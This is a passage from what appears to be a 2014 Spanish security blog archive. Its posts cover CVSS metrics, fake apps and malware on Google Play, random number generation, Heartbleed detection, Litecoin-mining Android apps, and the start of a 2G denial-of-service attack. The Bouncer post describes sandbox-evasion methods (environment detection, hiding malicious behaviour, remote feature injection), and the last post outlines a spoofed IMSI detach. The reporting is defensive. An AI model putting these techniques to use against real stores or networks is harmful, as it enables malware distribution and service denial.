a la complejidad del ataque del proceso que lleva a cabo el atacante para explotar la vulnerabilidad. Quizás el valor más subjetivo, valora la complejidad de que se acceda a los sistemas vulnerables. Authentication: este factor suministra información relacionada al número de veces que un atacante debe autenticarse en un objetivo antes de poder explotar una vulnerabilidad. Por ejemplo, explotar la vulnerabilidad puede requerir que el usuario esté autenticado (elevación de privilegios, por ejemplo) o no (acceso anónimo por la web). Temporal Metrics Una vulnerabilidad puede considerarse igual de grave si existe parche o si no, si está siendo explotada por atacantes o si se ha revelado de forma responsable... incluso, durante las primeras horas desde que se conoce la vulnerabilidad, el nivel de confirmación "oficial" es relevante para valorarla. Existen factores que pueden cambiar con el tiempo. Métricas temporales. Fuente: http://www.first.org/cvss/cvss-guide Dentro de los factores para valorar la métrica temporal, se encuentran: Exploitability: Este factor mide el nivel de información accesible acerca de la vulnerabilidad. Pretende valorar qué técnicas, informes, exploits funcionales están disponibles, etc. Remediation Level: Este factor está relacionado con tipo de solución disponible para la vulnerabilidad que se está valorando. Puede que exista parche oficial (bajaría su gravedad), solo se conozca alguna contramedida... o no haya remedio más que no usar el producto o servicio. Report Confidence: este factor establece el grado de confianza en la existencia de la vulnerabilidad y la credibilidad de los detalles técnicos conocidos y reportados sobre ella. Especialmente útil cuando se revelan vulnerabilidades en foros, sin ningún tipo de comprobación oficial sobre la veracidad o alcance de la información. Enviroment Métric Se encarga de estudiar las características que afectan al entorno en donde se encuentra la vulnerabilidad. Los factores de esta métrica dependen estrictamente del entorno que sufre el problema y su relación con los usuarios en él. En realidad, esta métrica resulta en un "ejercicio personal" de los afectados y sus circunstancias únicas. No existe un valor "universal" para esta métrica, como es el de la base, sino que cada administrador podrá calcular el suyo. Métricas de entorno. Fuente: http://www.first.org/cvss/cvss-guide Collateral Damage Potential: Mide el potencial de pérdidas de vidas o bienes materiales a través del daño o robo de los activos, además de la pérdida económica de la productividad o de los ingresos. ¿Cuánto daño me haría la explotación de esta vulnerabilidad? Target Distribution: Mide la proporción de los sistemas vulnerables. Se encarga de expresar una aproximación del porcentaje de sistemas que podrían verse afectados por la vulnerabilidad. Security Requirements: Permite personalizar el valor de la métrica de entorno dependiendo de la importancia del activo, medido en términos de confidencialidad, integridad y disponibilidad. Cómo calcularlo Entre las webs más conocidas que almacenan esta información se encuentran: National Vulnerability Database ( NVD), Open Sourced Vulnerability Database ( OSBDV), CVE Details o Qualys Security Alerts. Muchas de estas webs suelen almacenar además información general de las vulnerabilidades, incluyendo documentación, pruebas de concepto, soluciones, versiones a las que afecta, etc. Ejemplo de CVE Details con clasificación de vulnerabilidad Para calcular el valor CVSS de una vulnerabilidad, existen numerosas herramientas. Las disponibles vía web son, por ejemplo: Security Database Calculator. NVD calculator. Information-Technology Promotion Agency de Japón. Cisco Online Calculator. Goebel Consult. Bricade CVSS V2.0 Calculator. High-Tech Bridge CVSSv2 Calculator. Además, los programas de análisis y catalogación de vulnerabilidades más reputados, deben usar estos estándares para ofrecer la información más completa y objetiva a sus clientes. Sin ir más lejos, FaasT utiliza estos estándares, y ofrece información adicional de cómo ha sido calculado y por qué. Ejemplo en FaasT de vulnerabilidad con métricas estándar * Ocho siglas relacionadas con las vulnerabilidades (I): CVE * Ocho siglas relacionadas con las vulnerabilidades (II): CWE y CAPEC * Ocho siglas relacionadas con las vulnerabilidades (IV): CWSS Umberto Francesco Schiavo umberto.schiavo@11paths.com
23 de abril de 2014
El negocio de las "FakeApps" y el malware en Google Play (VI): Limpieza "manual"
Seguimos observando las apps falsas en Google Play, cómo se comportan y cómo funciona este negocio. Si en la anterior entrada estudiamos qué estrategias automáticas sigue Google Play para limpiar su store e intentar mitigar el problema, ahora veremos qué políticas y métodos "manuales" aplica. Vamos a hablar de qué estrategias ha seguido Google Play para intentar detectar y eliminar las aplicaciones falsas. Puesto que (principalmente) la razón de ser de las "FakeApps" es instalar malware o sistemas de publicidad en el dispositivo del usuario, la política de la store con respecto a la publicidad está íntimamente relacionada con el este tipo de aplicaciones y sus restricciones les afectan directamente. ¿No más anuncios intrusivos? Durante el verano de 2013, Google Play modificó sus condiciones para la publicidad añadida a las aplicaciones. Envió un correo a los desarrolladores avisando sobre cambios en su política. En él, entre otras notificaciones, se alertaba explícitamente sobre: "Restringimos el uso de nombres e iconos que puedan confundir por lo similar con apps existentes en el sistema, para reducir la confusión." Aunque habla explícitamente de nombres e iconos que puedan confundir por su similitud con apps existentes en el sistema, en realidad también han aplicado la política a otras apps ya alojadas en Google Play. Desde finales de año, es mucho más difícil subir apps con un icono idéntico a otra existente. También durante el verano pasado, modificaron sus políticas de desarrollo, principalmente con la intención de acabar con los modelos de publicidad más molestos. Estos suelen ser los que vienen en forma de spam en la barra de notificaciones. AirPush (un SDK de desarrolladores para sindicar la publicidad) es la empresa que más utilizaba este molesto sistema de spam. Las políticas, ahora incluyen: "Las aplicaciones y sus anuncios no deben añadir ni modificar marcadores ni opciones de configuración del navegador ni añadir accesos directos a la pantalla de inicio o iconos en el dispositivo del usuario como servicio a terceros o con fines publicitarios." "Las aplicaciones y sus anuncios no deben mostrar anuncios mediante notificaciones del sistema en el dispositivo del usuario, a menos que dichas notificaciones provengan de una función integral proporcionada por la aplicación instalada (por ejemplo, la aplicación de una compañía aérea que notifica a sus usuarios ofertas especiales o un juego que informa a los usuarios de promociones integradas en el juego)." Esto fue un golpe para las compañías de publicidad más agresivas como Moolah Media, Smaato, LeadBolt o StartApp. Prácticamente, todas ellas ofrecen formatos similares de publicidad, entre los que figuran la instalación de iconos, el mencionado envío de notificaciones, la creación de marcadores "favoritos" o páginas de inicio en los navegadores. Pero AirPush es de las más agresivas. Tanto, que existen varias herramientas en el propio Google Play para saber si una aplicación hace uso de este sistema de publicidad. Google decidió retirar todas las aplicaciones que las incluyeran, y se dio de plazo hasta final de septiembre de 2013. Hoy siguen existiendo en Google Play apps anteriores a esa fecha que lo contenían, todavía disponibles. Igualmente, no resulta complicado encontrar apps recientes que incorporan esta fórmula de publicidad agresiva. Patente "antipiratería" Recientemente, Google desveló una patente que permitía saber si una aplicación "se parecía" a otra. En ella, aunque no se habla explícitamente de Google Play, se observa claramente cómo está destinada a evitar los clones en este market. Comprueba una serie de parámetros de apps que ya tiene registradas y se compara si un nuevo programa se "parece demasiado" a través de una puntuación que evalúa su similitud. Este movimiento está claramente destinado a evitar los "reempaquetamientos" que se hicieron populares en Google Play hace dos años: un atacante tomaba una app famosa, le incluía publicidad o malware, y la volvía a subir a Google Play. Retirada de aplicaciones Google Play se está "limpiando a sí mismo" continuamente. Se eliminan actualmente de su market una media de entre 1000 a 1500 apps al día. Dependiendo del día se puede llegar a las 3000 . Las apps desaparecen porque las retiran los propios desarrolladores o porque Google detecta que alguna app está violando alguna regla establecida en su mercado. También porque suspenda cuentas de desarrolladores completas y con él se vayan todos sus programas. Sin embargo, el número de apps alojadas no para de crecer. Imagen de app retirada en Google Play Si atendemos a cuánto tiempo tarda Google en retirar algunas aplicaciones. Podemos observar, a grandes rasgos, tres "franjas" de actuación. Entre 24 y 40 horas. Las aplicaciones más "llamativas" suelen mantenerse en Google Play entre 24 y 40 horas. Hace algunos meses, en Eleven Paths ya hablamos sobre un AdBlock Plus falso en Google Play. No era el primero, ni fue el último, pero llamó la atención el hecho de colar una copia exacta de un programa prohibido por la propia Google. El programa estuvo online entre 30 y 40 horas. Y luego fue sustituido por otro. Después, el atacante siguió actuando, subiendo a Google Play aplicaciones falsas y adware, pero no volvió a usar AdBlock como reclamo. Más de 48 horas. Este es el tiempo que "aguantan" las aplicaciones menos llamativas, que "disimulan" ser malware no usando ni nombres ni imágenes exactas. Varios WhatsApp falsos durante final de 2013 pasaron más de 5 días online. Otros fakes populares como el juego Clumsy Ninja (disponible oficialmente para Android desde el 15 de abril) podían pasar entre 3 y 4 días online, con un gran número de descargas. Clumsy Ninja falso que contenía adware Más de una semana. Otros fakes menos llamativos pueden durar mucho más tiempo en Google Play. Es el caso de este fake del juego Taxi Driver 2, se mantuvo hasta cinco meses online. Se trata de un programa "reempaquetado" con publicidad no tan agresiva como AirPush. Este fake (a la derecha) consiguió mantenerse en Google Play durante 5 meses Otros atacantes, con ligeros cambios en el nombre, han conseguido que sus fakes se mantengan bastante tiempo en Google Play. Por ejemplo, este "fabricante" llamado NEW APP consiguió en octubre permanecer casi una semana online, usando las mismas imágenes aunque modificando ligeramente los nombres de los juegos. Ejemplo de desarrollador con claros fakes que consiguió mantenerse una semana en Google Play * El negocio de las "FakeApps" y el malware en Google Play (I): Introducción * El negocio de las "FakeApps" y el malware en Google Play (II): Tipos de "fakes" * El negocio de las "FakeApps" y el malware en Google Play (III): Estrategias * El negocio de las "FakeApps" y el malware en Google Play (IV): Política y rentabilidad * El negocio de las "FakeApps" y el malware en Google Play (V): Limpieza automática * El negocio de las "FakeApps" y el malware en Google Play (VI): Limpieza "manual" * El negocio de las "FakeApps" y el malware en Google Play (VII): Cómo llegan a las víctimas * El negocio de las "FakeApps" y el malware en Google Play (VIII): Permisos en las apps * El negocio de las "FakeApps" y el malware en Google Play (IX): ¿Qué hacen y cómo se programan las apps? Sergio de los Santos ssantos@11paths.com @ssantosv
21 de abril de 2014
Cómo se usa la aleatoriedad en la seguridad
La aleatoriedad es un factor importante en muchos elementos de la informática, sobre todo a la hora de generar claves criptográficas seguras para protocolos criptográficos. Un elemento criptográfico generado a partir de una semilla que no sea suficientemente aleatoria, puede convertirse en un blanco fácil para un criptoanálisis por comparación de frecuencias, por ejemplo. ¿Cómo se consigue aleatoriedad en un sistema? Se han dado casos en los que, por diferentes razones, se han utilizado generadores vulnerables en diferentes plataformas. Fueron importantes problemas derivados de un mal uso de la aleatoriedad, que tuvieron graves consecuencias. Malas experiencias OpenSSL en Debian. En 2008 se encontró un error en la implementación. Se eliminaron dos líneas críticas en la generación de números aleatorios para usar en la creación de las claves. Esto dejó la función devolviendo números cuyo único factor para alimentar la aleatoriedad era solamente el PID del proceso (entre 1 y 32768). Estas líneas fueron eliminadas por sugerencia de Valgrind (un software que busca fugas de memoria en códigos C) mientras se depuraba el código de OpenSSL. Otro caso sonado fue el de Windows 2000 y XP. A finales de 2007, se descubrió una debilidad en su código de generación de números pseudoaleatorios. Aunque sin disponer del algoritmo, se consiguió llegar a un punto en el que un posible atacante podría predecir los números que habían sido generados previamente y podrían ser generados en un futuro. En 2010, la Play Station 3 sufrió también las consecuencias de una mala implementación en la generación de números pseudoaleatorios. En realidad, ni siquiera había aleatoriedad. La generación de claves privadas ocurría siempre a partir del mismo número, por lo que cualquier persona podía firmar una aplicación para PS3. En agosto de 2013, se supo que la función SecureRandom que usa Android no accedía a /dev/urandom (cuando debería). Cualquier software que usara esa función se veía afectado, por ejemplo, las carteras de bitcoins. Hace muy poco, durante la CanSecWest, se descubrió que en la versión 7 de iOS se introdujeron problemas en su generador de números. Mejor entropía, mejor seguridad ¿Qué significa que algo sea aleatorio? En teoría, que no hay forma de predecirlo. Pensando en números, es aleatorio el que no hay forma de averiguar su valor hasta que se genera. Algo parecido a l a paradoja del gato de Schrödinger. Todos los sistemas operativos necesitan generar números aleatorios para diversos usos pero, generar aleatoriedad en algo tan determinista por definición como un ordenador, no es trivial. Y este es uno de los problemas de los RNG (Random Number Generator), que en realidad son PRNG (Pseudo Random Number Generator) porque es imposible conseguir una aleatoriedad del 100%. El sistema debe conformarse con acumular cierta cantidad de entropía para poder simular la creación de algo aleatorio, aun sufriendo una componente determinista. Veamos esto con más detalle: La entropía (en este contexto) no es más que bytes de aleatoriedad añadidos de algunas fuentes pseudoaleatorias, como por ejemplo: drivers de dispositivos, algunos elementos en la secuencia de arranque de la máquina, audio o vídeo capturado desde el micrófono/cámara, movimientos del ratón, tiempo entre presionar una tecla u otra en el teclado... Existen otras formas de añadir más bytes pseudoaleatorios, por ejemplo con dispositivos que, midiendo el ruido que se genera en el salto de electrones en una unión PN, añaden mucha entropía al sistema. ¿Dónde se añade toda esta entropía y qué se hace con ella? Esto varía entre sistemas operativos, aunque muchos se basan en la implementación que usa el kernel de Linux, que funciona más o menos así: /dev/random y /dev/urandom /dev/random y /dev/urandom son dos archivos especiales en el Kernel de Linux cuya función es mantener una fuente de entropía (como una especie de almacén) que consigue de diferentes fuentes (como las mencionadas anteriormente). Desde esa fuente selecciona algunos bytes de entropía y genera un número aleatorio cuando se le llama. No se suele hacer una llamada directa de sistema a /dev/random y a /dev/urandom en busca de números aleatorios, sino que s e consiguen una serie de bytes de cualquiera de las dos fuentes y se usan como semillas para métodos/funciones implementadas en el programa que las necesite, a modo de PRNG. Cada programa podrá tener su PRNG. Veámoslo con un pequeño diagrama: Esquema básico de funcionamiento de /dev/random y /dev/urandom En él se observa cómo se "rellenan" (de forma simplificada) /dev/random y /dev/urandom. Del colector de entropía (de las fuentes que hemos mencionado antes) se estima la cantidad útil y se suma al contador de entropía. A esta entropía se le quita parte del bias (eliminación de muestras no válidas por diversas razones) y después de pasar por el generador de números pseudoaleatorios es añadido a la fuente de aleatoriedad. La gran diferencia entre los dos es la comprobación de entropía: mientras una petición a /dev/urandom devolverá un valor aunque no quede mucha entropía en la fuente, /dev/random comprobará antes si la cantidad de entropía en el sistema es suficiente para llegar al mínimo especificado y bloqueará la petición hasta que ese mínimo se satisfaga, momento en el que se restará del contador de entropia. Aquí podemos ver el resultado de pedir datos constantemente a /dev/random. Se puede observar que se genera muy poca información. Tras el primer "parón", se comienza a mover el ratón del sistema. Esto genera la entropía necesaria para que el proceso siga adelante. Volcado directo de /dev/random Por el contrario, en la siguiente animación, se comprueba que /dev/urandom devuelve tanto como se le pida, sin bloqueos, puesto que no espera a que la entropía sea suficiente. Volcado directo de /dev/urandom . Esta diferencia ha llevado a problemas y discusiones a la hora de decidir cuál de los dos archivos usar para la generación de números pseudoaleatorios. En realidad, se resume en que: /dev/random ofrece números con aleatoriedad “de mayor calidad”, pero el bloqueo puede ser un problema si se encuentra bajo gran demanda. /dev/urandom ofrece números con aleatoriedad "menor" pero sin bloqueos ni "esperas". Existen muchos puntos de vista al respecto sobre cuál usar para qué, pero está relativamente establecido que para generar claves criptográficas que vayan a tener una larga duración, como las usadas en SSH o SSL se debe usar /dev/random. Para prácticamente todos los demás usos, es más rápido y menos "arriesgado" utilizar /dev/urandom. Juan Luis Sanz juanluis.sanz@11paths.com
15 de abril de 2014
Ya está disponible el plugin de Heartbleed para FaasT
Poco podemos aportar sobre este problema que no se haya dicho ya. Una vulnerabilidad gravísima por muchas razones y que agita algunos cimientos en Internet. Conocida como Heartbleed, CVE-2014-0160, afecta a distintas versiones de OpenSSL, desde la 1.0.1 hasta la 1.0.1f y 1.0.2-beta1. A partir de la versión 1.0.1g se corrige la vulnerabilidad. Aunque en un principio los medios hablaron del 66% de sitios afectados, en realidad esa cifra corresponde a la cuota de uso de Apache y nginx, que entre ellos pueden (o no) usar OpenSSL y de entre ellos, a su vez pueden (o no) ser vulnerables. En futuras entradas esperamos hablar en detalle sobre la vulnerabilidad, y algunas curiosidades y repercusiones. Ya hemos corregido el problema en nuestros propios servidores de Latch. Por cierto, hemos renovado los certificados de nuestra API. Recomendamos por tanto a los clientes que, si realizan una comprobación del certificado durante sus consultas, descarguen el nuevo certificado y adapten sus sistemas. ¿Qué me pueden hacer? Si se utiliza una versión vulnerable de OpenSSL en un sitio web, potencialmente cualquier usuario podrá acceder a una porción de memoria del proceso OpenSSL. Esto significa que lo que haya en ese instante en la memoria puede ser extraído por un atacante de manera "limpia", fácil y remota. En otras palabras: si en esa porción de memoria que se extrae, se encuentran usuarios y contraseñas, cookies de sesión, o incluso la clave privada del certificado (algo que depende de la probabilidad y de cuántas veces se realice la petición)... esta información quedará expuesta. Dado que se pueden realizar tantas peticiones como sea necesario, sí que parece grave. Por tanto el comprometido no es solo el servidor, sino sus usuarios, sus cuentas, etc. Incluso, dependiendo de cómo esté configurado SSL, podrían descifrarse conversaciones cifradas retrospectivamente. Existen ya numerosos scripts y pruebas de concepto que permiten, con un solo clic, atacar a los servidores vulnerables... y como efecto colateral, a sus usuarios. FaasT y el Heartbleed El equipo de Faast se ha puesto manos a la obra para adaptar y crear el código que compruebe si realmente los sitios web de los clientes son vulnerables a este grave problema. Ya se dispone de esta funcionalidad en la herramienta, en forma de plugin. Es importante que, si se utiliza OpenSSL en el servidor, se compruebe si se es vulnerable. Detección en tiempo real de HeartBleed, en la lista de vulnerabildiades de FaasT Faast dispone de una característica que permite mostrar, en forma de imagen, la evidencia por la que se ha detectado que efectivamente, la vulnerabilidad es aprovechable en el servidor objetivo. Esta evidencia se muestra en el informe del escaneo (en PDF), pero además se puede ver desde la interfaz web de usuario. Ejemplo de evidencia generado por FaasT
10 de abril de 2014
Heartbleed plugin, ready for FaasT
There is a lot of good information about Hearbleed out there, there is little more to add. It is a extremely serious vulnerability, that has shaken the internet from the bottom up. Known as Heartbleed, CVE-2014-0160, affects different versions of OpenSSL, from 1.0.1 to 1.0.1f and 1.0.2-beta1. It is fixed in 1.0.1g version. Although media talked about 66% of affected sites, actually that is the div corresponding to Apache and nginx market. Not all of them will use OpenSSL and, not all of them using it would be vulnerable. The problem has already been fixed in our Latch servers. By the way, we have renewed our certificates for the API connection. If you as a costumers were doing a certificate check on your side, you must update it with the new ones released yesterday What can happen to me? If a vulnerable version of OpenSSL is used, potentially, any user could be able to access an OpenSSL memory chunk. This means that, whatever is in memory in that moment, may be extracted by an attacker in a "clean", easy and remote way. In other words, if this extracted memory chunk contains users, passwords or session cookies or even the private key for that server (something that depends on probability and on "brute force")... this information would be exposed. Since an attacker may connect as many times as necessary, it seems serious indeed. So, the one attacked is not only the server, but its users, accounts, etc. Even depending on how SSL is condivd, conversations between server and client could be retrospectively decrypted. There are lots of scripts with proof of concepts that allow to, with just a click, attack vulnerable servers and, as a collateral effect, its users. FaasT and Heartbleed The Faast team has been getting with it during the last two days to adapt and create the code that checks if webs are indeed vulnerable. We already have this feature in our tool, as a plugin. FaasT tests the vulnerability with any OpenSSL used, even if its version claims to be safe. HeartBleed real time detection, shown in FaasT vulnerabilities list Faast features includes a way to show, as a picture, the evidence of a vulnerability exploited in a target. The evidence is shown both in the scanning report (in PDF) and the web interface. Example of an evidence with FaasT
10 de abril de 2014
El negocio de las "FakeApps" y el malware en Google Play (V): Limpieza automática
Seguimos observando las apps falsas en Google Play. En esta entrada estudiaremos qué estrategias sigue Google Play para limpiar su store e intentar mitigar el problema. ¿Qué herramientas utiliza? ¿Cuánto tarda en retirar apps? ¿Cuántas retira? Los esfuerzos de limpieza: Bouncer En febrero de 2012, Google lanza Bouncer. Se trataba de una especie de filtro (sandbox) por la que pasarían las apps antes de ser publicadas. Pretendía, por un lado, detectar y eliminar las amenazas antes de subirlas al repositorio. Por otro, estudiar a los desarrolladores y denegar el acceso a posibles defraudadores. Aunque se trataba de una buena medida, parece que no ha conseguido completamente su objetivo por varias razones. ¿Han subido las cifras? El malware sigue siendo un problema en Google Play. Para algunas compañías, incluso ha empeorado. Según RiskIQ, en 2011 existían 11.000 apps en Google Play que contenían malware capaz de robar información o hacer fraude. En 2013, se eleva a 42.000. Esto suena muy escandaloso, pero el número de apps almacenadas ha subido también considerablemente, por tanto es mejor acudir a los términos relativos (que no aparecen en los titulares). Esto supone que según RiskIQ en Google Play había un 2.7% de apps maliciosas en 2011, 9.2% en 2012 y 12.7% en 2013. ¿Son estos datos precisos o se exageran porque RiskIQ vende un producto que intenta luchar precisamente contra ese problema? No podemos estar al 100% seguros. Por ejemplo, no queda claro por qué en el informe se habla de 42.000 apps maliciosas y que esto supone un 12.7% de Google Play. Si es así, hablaríamos de poco más de 332.000 aplicaciones, cuando existen muchas (muchísimas) más apps en esa Store. También puede incluso que el dato sea peor, debido a (como siempre) el problema de clasificar el malware. ¿Se le escapa malware? Depende de sus técnicas. En concreto RiskIQ parece que huye de firmas, y que analiza el comportamiento directamente en el tráfico, con un sistema que emula usuarios reales. En principio no parece una mala aproximación. También especifica qué es malware para ellos. Literalmente dicen que "RiskIQ solo cuenta apps de Android en Google Play como maliciosas si son o contienen spyware y troyanos SMS que": Recojan coordenadas GPS, lista de contactos, emails, etc. par terceros. Envíen mensajes premium. Suscriban el teléfono a servicios premium. Graben conversaciones y las envíen a atacantes. Permitan tomar el control del teléfono infectado. Descarguen otro malware a los teléfonos infectados. Quizás el primer punto no quede claro. ¿Con solo recoger coordenadas GPS ya se considera malware? Entonces las cifras podrían estar muy distorsionadas. RiskIQ pone la guinda añadiendo que además de existir más malware, es retirado más lentamente del Store. En 2011 se retiraban un 60% de las apps maliciosas, en 2012 un 40% y en 2013 un 23%. Aunque este dato requiere conocer cuánto tiempo de margen se da a Google Play para que retire una aplicación, y eso tampoco queda claro. App retirada en Google Play Bouncer ha sido eludido en varias ocasiones Una sandbox, por simple diseño del programa, puede no detener malware. Por ejemplo, unos meses después de su lanzamiento, en junio de 2012, Jon Oberheide y Charlie Miller descubrieron que Bounce utiliza un entorno virtual QEMU y que todas las solicitudes de Google procedían de un bloque de IPs específico. Los investigadores crearon y enviaron aplicaciones falsas a Google Play que se dedicaron a registrar los procesos del sistema y lanzar una conexión inversa a sus propios servidores cuando eran ejecutadas en Bouncer. Así demostraron varios puntos débiles, que pueden ser aprovechados fácilmente por los desarrolladores de código malicioso implementando aplicaciones que se comporten como legítimas cuando se detecten corriendo en ese entorno virtual específico. Luis Delgado, como prueba de concepto, también fue capaz de subir una app con capacidades de control remoto a principios de 2012, disfrazada de programa que solo necesitaba acceso a la red. Bloxor, creada en 2012 como prueba de concepto. Trustwave explicó también en la conferencia de seguridad Black Hat 2012 en Las Vegas que es posible eludir el sistema Bouncer con una aplicación maliciosa, pero con otros métodos. Nicolas Percoco y Sean Schulte desarrollaron SMS Bloxor, una aplicación para bloquear los mensajes de texto procedentes de determinados números de teléfono... pero que además robaba datos personales tales como fotos, mensajes de texto, contactos, registros de llamadas, e incluso podía realizar ataques de denegación de servicio. Para conseguirlo, reprimían el comportamiento malicioso de la aplicación cada vez que detectaba que estaba siendo analizada por Bouncer. Además, idearon un puente JavaScript, una solución legítima que permitía a los desarrolladores añadir nuevas características maliciosas de forma remota a aplicaciones que ya habían sido aceptadas. Mantuvieron la app en Google Play durante semanas, cada vez añadiendo más comportamiento malicioso. Para evitar que fuese descargada, se puso a un precio desorbitado. El problema de eludir las sandbox no es nuevo ni fácil de solucionar. Las casas antivirus desde siempre se han enfrentado a elusiones de sistemas de sandbox (las que utilizan para la clasificación rápida y automática de malware) y al comportamiento de los programas como malware "en diferido", tras pasar por la sandbox como legítimos. Y aun hoy, siguen luchando contra estas técnicas que los atacantes ponen habitualmente en práctica. Muchas de estas técnicas, actualmente ya no son posibles tal y como fueron descubiertas, gracias a mejoras introducidas en el sistema, pero no por ello imposibles de conseguir. Atacantes reincidentes No es del todo cierto que a los atacantes se les deniegue el acceso y se les suspenda la cuenta cuando suben apps fraudulentas y estas son detectadas. Hemos visto cómo Google Play retiraba apps de un developer fraudulento (con infracciones graves), sin retirarle la cuenta. El último ejemplo es bastante reciente con el malware que minaba criptomonedas. En la próxima entrega incidiremos sobre cuánto tardan las apps en ser retiradas y en otros métodos de limpieza. * El negocio de las "FakeApps" y el malware en Google Play (I): Introducción * El negocio de las "FakeApps" y el malware en Google Play (II): Tipos de "fakes" * El negocio de las "FakeApps" y el malware en Google Play (III): Estrategias * El negocio de las "FakeApps" y el malware en Google Play (IV): Política y rentabilidad * El negocio de las "FakeApps" y el malware en Google Play (V): Limpieza automática * El negocio de las "FakeApps" y el malware en Google Play (VI): Limpieza "manual" * El negocio de las "FakeApps" y el malware en Google Play (VII): Cómo llegan a las víctimas * El negocio de las "FakeApps" y el malware en Google Play (VIII): Permisos en las apps * El negocio de las "FakeApps" y el malware en Google Play (IX): ¿Qué hacen y cómo se programan las apps? Sergio de los Santos ssantos@11paths.com @ssantosv
7 de abril de 2014
Curiosidades sobre el malware para Android que mina Litecoins
Hace ya algunos años que se intuyó lo que ocurriría en los ordenadores de sobremesa ( y no solo en los PC): con la llegada del dinero (y las carteras) virtuales, el malware comenzaría a robarlo. Como no todos disponen de cartera, también aprovecharían la capacidad de cómputo para "minar" moneda. Y el paso natural es que el malware saltara al teléfono para minar bitcoins. Si bien ya existían muestras aisladas fuera del market oficial, ahora se han encontrado apps de este tipo en Google Play. Qué se ha encontrado Ya se conocían ciertos programas que, disfrazados bajo apps con otras supuestas utilidades, contenían código para minar Bitcoin, Litecoin, y Dogecoin. Lo cierto es que existen incluso apps legítimas para minar desde el teléfono. Los atacantes habían reempaquetado ciertas apps e introducido el código en su interior. Descargaban un fichero de configuración y minaban en segundo plano. Pero, hasta ahora, fuera de Google Play. Una de las apps encontradas que minaban Litecoins Trend Micro ha encontrado ahora otros programas en Google Play. Estas apps minaban solo Litecoins, y se activaban cuando el teléfono estaba cargando para no agotar tan rápido la batería. Trend Micro dice que el programa ha sido descargado por millones de usuarios y de ahí deduce que todos están infectados. No podemos saber si esto es del todo cierto. Por nuestra investigación, creemos que la aplicación no siempre contuvo ese código, sino que se introdujo más tarde. Por tanto no todas las descargas tienen que corresponder a la versión "contaminada". Aunque sí es cierto que se publicaron varias versiones y que, si no aumentaron los permisos, se podía haber actualizado de forma automática con el código malicioso. Por ejemplo, la app se llamaba en un principio "Songs" (y hacía lo que prometía) pero luego pasó a llamarse "Indian songs". Creemos que en algún momento introdujo el código. Así se veía la app el 26 de marzo Así se veía la app el 14 de marzo De hecho, hemos encontrado versiones anteriores que no contienen el código minado. Al tratarse de dos aplicaciones creadas por "aparentemente" dos desarrolladores diferentes, podría también tratarse de un robo de cuentas en Google Play. Incluso, inexplicablemente, Google Play, aunque borró las apps contaminadas, mantiene otra aplicación del mismo programador (Da Xpert) todavía activa (aunque solo en algunos países). App que se mantiene en Google Play, del mismo desarrollador Cómo funcionaban y algunas curiosidades El código era claro. Socialtokenmobile.android.miner contenía las instrucciones necesarias para minar y comunicarse con el pool. Las aplicaciones se mantuvieron al menos un mes en Google Play, aunque ya hemos mencionado que quizás no siempre infectadas. Fueron retiradas después de que Trend Micro las detectara. Los usuarios no notaron nada en ellas, ni siquiera se refleja en los comentarios, excepto cuando ya era tarde. Código incrustado en las apps para minar litecoins Según nuestras investigaciones, el atacante continúa subiendo aplicaciones a Google Play y mantiene al menos 25 activas bajo diferentes cuentas. Por ahora, hemos comprobado que ninguna contiene código para minar Litecoins, pero sí que, en cualquier momento y como ha hecho con estas, podría actualizarlas de forma transparente siempre que no añada permisos a la nueva versión. En cualquier caso, no sabemos el éxito de la operación. Quizás se trate de un caso anecdótico. ¿Tiene sentido minar en un teléfono? Quizás sí. Litecoin dispone de programas específicos para Blackberry y Android. Aunque basada en el protocolo de Bitcoin, ha sido diseñada para no necesitar tanto hardware para minar. Litecoin puede minar ("crear monedas") de manera más rápida, con dos minutos de promedio frente a los 10 de bitcoin. También ha sido diseñada para que existan 84 millones de unidades, en vez de 21 como Bitcoin. Litecoin se considera más adecuada para las pequeñas transacciones diarias y habituales, mientras que Bitcoin tiene su mercado en las transacciones más voluminosas. Un Litecoin vale actualmente unos 13 dólares y existen 27 millones circulando. Pero , ¿qué es minar? A grandes rasgos, minar es validar transacciones, y a los usuarios que dedican sus recursos a validar, se les recompensa con monedas. Las transacciones criptográficas con moneda virtual necesitan de potentes cálculos para poder validarlas, y las realizan de forma horizontal los usuarios (no existe la figura de un banco ni nada parecido). Los usuarios, para validar transacciones y comprobar que no se hacen trampas utilizando el mismo material cirptográfico, (o sea, la misma moneda dos veces) deben validar intensamente y entre varias partes las cadenas utilizadas (el sistema está basados en criptografía simétrica y asimétrica). Para motivarlos, ese tiempo de validación (gastando recursos propios) se paga. Así que minar consiste en tomar un "pool" de un servidor (compartido, normalmente) de transacciones a validar. En el caso de los bitcoins, por cada bloque de transacciones se recibían 50 bitcoins. Ahora son ya 25, y dentro de unos años, 12.5. De ahí que cada vez cueste "más" minar. Sergio de los Santos ssantos@11paths.com @ssantosv
2 de abril de 2014
Ataque de denegación de servicio en redes 2G
La técnica descrita en esta entrada fue propuesta en 2010 por Sylvain Munaut. Aunque una denegación de servicio suene a aprovechamiento de algún fallo o recursos agotados, realmente esta técnica no viola ningún principio de la arquitectura 2G y es perfectamente viable. Se trata de un ataque dirigido que se fundamenta en una idea muy sencilla. El atacante suplanta la identidad del usuario y envía un mensaje de IMSI detach a la red. De esta manera, la red marca a la MS del usuario como detached, y por tanto inalcanzable. En post anteriores hemos visto cómo llevar a cabo ataques man in the middle en redes GSM. Una vez que las comunicaciones entre la víctima y la red pasaban por la estación base falsa que el atacante había configurado, se podía hacer prácticamente cualquier cosa, desde simplemente intervenir la comunicación, hasta robar información vía ingeniería social suplantando a entidades oficiales o realizar una denegación de servicio. Pero este ataque que vamos a describir realizará una denegación de servicio sin necesidad de complejos recursos, sino aprovechando un punto débil del protocolo. El IMSI (International Mobile Subscriber Identity) es un número que identifica de forma única a un usuario de una red móvil. Este dato es confidencial, puesto que a partir de él es posible averiguar información sobre el usuario, incluyendo su localización. Por esta razón se almacena solo en la SIM y en la red (y no en las estaciones base). Para "protegerlo", la norma recomienda el empleo de un identificador temporal o TMSI en su lugar. Sin embargo, ya hemos descrito que bajo determinadas circunstancias una estación base puede forzar el envío del IMSI en claro. IMSI attach procedure El IMSI attach procedure es un procedimiento de registro del terminal móvil en la red. Tiene lugar fundamentalmente bajo dos circunstancias: cuando el móvil se enciende (es decir, pasa a estado activo) o cuando el móvil entra en una zona de cobertura. En el registro de ubicación de visitante (VLR, V isitor Location Register), la MS se marca con el flag attached, que indica que el terminal móvil es alcanzable por la red y por tanto puede enviar y recibir llamadas. Este procedimiento, en detalle, requiere los siguientes pasos: Al encenderse, la MS del usuario envía a la estación base más cercana un mensaje Channel Request solicitando un canal dedicado. Esta petición la realiza a través del canal común (RACH, 